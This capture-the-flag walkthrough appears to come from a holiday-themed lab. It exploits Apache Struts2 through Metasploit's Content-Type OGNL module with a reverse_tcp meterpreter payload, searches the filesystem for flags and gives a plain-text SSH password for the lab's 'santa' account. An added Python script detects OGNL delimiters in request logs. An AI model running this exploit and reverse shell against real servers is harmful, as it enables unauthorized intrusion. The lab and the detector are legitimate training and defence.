Metasploit and Struts2

nmap
22
80
111
Nmap reveals a web service running on port 80/tcp, identified as Apache Tomcat/Coyote JSP engine 1.1. When we connect to the web server, we are redirected to /showcase.action.

Googling for the terms "apache" and "showcase.action" confirms that the server is probably running "Struts 2".
search struts2
use 0 (did not work)
use exploit/multi/http/struts2_content_type_ognl
set rhosts
set rport
set lhost
set TARGETURI /showcase.action
set payload linux/x64/meterpreter/reverse_tcp
got meterpreter
to run the find command, use ---> shell
find / 2>/dev/null | grep -i flag  [-i: ignore case]
/usr/local/tomcat/webapps/ROOT/ThisIsFlag1.txt
ssh      -via /home/santa
santa:rudolphrednosedreindeer
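
On the defender's side, the module name above (struts2_content_type_ognl) points to an OGNL expression carried in the Content-Type header, which is something request logs can be checked for. The following is an added example, not part of the original notes; the tab-separated log format, the sample lines and the function name are constructed assumptions, and the log must be configured to record Content-Type.

```python
import re

# Constructed sample: tab-separated client IP, method, path, Content-Type.
# The log format is an assumption; it must record the Content-Type header.
SAMPLE_LOG = (
    "10.0.0.5\tPOST\t/showcase.action\tmultipart/form-data; boundary=----abc123\n"
    "10.0.0.9\tGET\t/showcase.action\t-\n"
    "10.0.0.7\tPOST\t/showcase.action\t%{1+1}.multipart/form-data\n"
    "10.0.0.8\tPOST\t/upload.action\tapplication/x-www-form-urlencoded; charset=UTF-8\n"
    "10.0.0.7\tPOST\t/showcase.action\ttext/plain${2*2}\n"
    "10.0.0.6\tPOST\t/showcase.action\tnot a media type\n"
)

# HTTP "token" characters, used to build a strict type/subtype;param=value check.
TOKEN = r"[A-Za-z0-9!#$%&'*+.^_`|~-]+"
MEDIA_TYPE = re.compile(
    rf'^{TOKEN}/{TOKEN}(?:\s*;\s*{TOKEN}=(?:{TOKEN}|"[^"\\]*"))*\s*$'
)
# Expression delimiters (%{ or ${) never belong in a legitimate media type.
OGNL_DELIM = re.compile(r"[%$]\{")


def suspicious_requests(log_text):
    """Return (ip, path, reason) for requests with an abnormal Content-Type."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ip, _method, path, ctype = line.split("\t", 3)
        if ctype == "-":  # no Content-Type header was sent
            continue
        if OGNL_DELIM.search(ctype):
            reason = "expression delimiter in Content-Type"
        elif not MEDIA_TYPE.match(ctype):
            reason = "malformed Content-Type"
        else:
            continue
        findings.append((ip, path, reason))
    return findings


if __name__ == "__main__":
    for ip, path, reason in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {path}: {reason}")
```
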

Task

  • Compromise the web server using Metasploit. What is flag1?
    [redacted challenge flag]
    
  • Now you’ve compromised the web server, get onto the main system. What is Santa’s SSH password?
    [redacted sensitive answer]
    
  • Who is on line 148 of the naughty list?
    Melisa Vanhoose      --via sed -n 148p ./< naughty list >
    
  • Who is on line 52 of the nice list?
    Lindsey Gaffney      --via sed -n 52p ./< nice list >